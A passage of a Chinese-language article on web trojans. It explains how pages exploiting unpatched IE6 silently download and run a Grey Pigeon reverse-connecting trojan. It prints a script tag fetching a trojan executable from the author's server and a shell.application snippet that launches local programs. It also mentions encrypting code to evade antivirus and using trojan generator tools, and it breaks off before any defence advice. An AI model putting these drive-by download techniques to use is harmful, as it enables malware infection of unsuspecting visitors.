如果你访问××网站（国内某门户.docxVIP

如果你访问××网站（国内某门户网站），你就会中灰鸽子木马。这是我一黑客朋友给我说的一句说。打开该网站的首页，经检查，我确实中了灰鸽子。怎么实现的呢？他说，他侵入了该网站的服务器并在网站主页上挂了网页木马；一些安全专家常说，不要打开陌生人发来的网址，为什么？因为该网址很有可能就是一些不怀好意者精心制作的网页木马。 　　以上只是网页木马的两种形式，实际上网页木马还可以挂在多媒体文件（RM、RMVB、WMV、WMA、Flash）、电子邮件、论坛等多种文件和场合上。很可怕吧，那么用户如何防范网页木马呢？下面我们就先从网页木马的攻击原理说起。一、网页木马的攻击原理　　首先明确，网页木马实际上是一个HTML网页，及其它网页不同的是该网页是黑客精心制作的，用户一旦访问了该网页就会中木马。为什么说是黑客精心制作的呢？因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞，让IE在后台自动下载黑客放置在网络上的木马并运行（安装）这个木马，也就是说，这个网页能下载木马到本地并运行（安装）下载到本地电脑上的木马，整个过程都在后台运行，用户一旦打开这个网页，下载过程和运行（安装）过程就自动开始。　　有朋友会说，打开一个网页，IE浏览器真的能自动下载程序和运行程序吗？如果IE真的能肆无忌惮地任意下载和运行程序，那天下还不大乱。实际上，为了安全，IE浏览器是禁止自动下载程序特别是运行程序的，但是，IE浏览器存在着一些已知和未知的漏洞，网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。　⒈自动下载程序　　SCRIPT LANGUAGE=icyfoxlovelace src=/1.exe/SCRIPT ?　　小提示：代码说明　　a. 代码中“src”的属性为程序的网络地址，本例中“/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序，这段代码能让网页下载该程序到浏览它的电脑上。　　b. 也可以把木马程序上传到免费的主页空间上去，但免费空间出于安全的考虑，多数不允许上传exe文件，黑客可能变通一下把扩展名exe改为bat或com，这样他们就可以把这些程序上传到服务器上了。　　把这段代码插入到网页源代码的/BODY…/BODY之间（如图1），然后用没打补丁的IE6打开，接下来，打开IE的临时目录Temporary Internet Files，你会发现，在该文件夹中有一个“1.exe”文件，这也就是说，该网页已自动下载了我放置在Web服务器上的灰鸽子木马。图1 网页木马示例小提示：灰鸽子木马　　为什么一定要用灰鸽子木马呢？因为灰鸽子是反弹型木马，该木马能绕过天网等大多数防火墙的拦截，中马后，服务端即被控端能主动连接控制端（客户端），也就是说，一旦被控端连接到Internet，在控制端那里，被控端就会“自动上线”（如图2）。图2 灰鸽子控制短示例（汗！又一大毒枭:)）　　⒉自动运行程序　　SCRIPT LANGUAGE=javascript type=text/javascript var shell=new ActiveXObject(shell.application); space(c:\\Windows\\).items().item(Notepad.exe).invokeverb(); /SCRIPT 　　把这段代码插入到网页源代码的/BODY…/BODY之间，然后用IE打开该网页，你会发现，这段代码可以在没有打相关补丁的IE6中自动打开记事本。　　这段代码使用了shell.application控件，该控件能使网页获得执行权限，替换代码中的“Notepad.exe”（记事本）程序，可以用它自动运行本地电脑上的任意程序。　　通过以上的代码我们可以看出，利用IE的漏洞，也就是说在网页中插入适当的代码，IE完全可以自动下载和运行程序，不过，IE一旦打了相关补丁，这些代码就会失去作用。另外，这些代码要运行和下载程序，有些杀毒软件的网页监控会视它们为病毒，为了逃避追杀，黑客可能会使用一些工具对网页的源代码进行加密处理（如图3）。图3 加密后的网页代码二、网页木马的基本用法　　理解了网页木马攻击的原理，我们可以制作自己的网页木马，但这需要你根据IE漏洞写出利用代码。实际上，在网上有很多高手已写出了一些漏洞的利用代码，有的还把它写成了可视化的程序。在搜索引擎输入“网页木马生成器”进行搜索，你会发现，在网上有很多利用IE的各种漏洞编写的网页木马生成器，它们大都为可视化的程序，只要你有一个木马（该木马必须把它放置到网络上），利用这些生成器你就可以立即生成一个网页，该网页就是网页木马，只要他人打开这个网页，该网页就可以自动完成下载木马并运行（安装）木马的过程。　　在我的电脑上我已下载了一个网页木马